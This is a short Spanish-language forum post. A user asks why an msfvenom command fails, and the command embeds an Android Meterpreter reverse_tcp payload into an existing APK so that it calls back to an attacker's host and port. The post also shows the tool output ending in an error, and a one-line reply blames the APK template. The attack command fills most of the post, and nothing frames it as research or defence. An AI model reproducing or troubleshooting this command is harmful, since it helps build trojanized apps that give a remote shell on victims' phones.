Disculpen tengo el siguiente problema, alguien podria ayudarme ya desinstale e instale metasploit de nuevo
sudo msfvenom -x appdebug.apk -p android/meterpreter/reverse_tcp lhost=xxx.xxx.x.xx lport=80 -o exploit.apk
Using APK template: appdebug.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: undefined method `gsub' for #<Nokogiri::XML::NodeSet:0x0000559b311010b8>
No es problema de Msfvenom sino del template apk que está utilizando.
-Kirari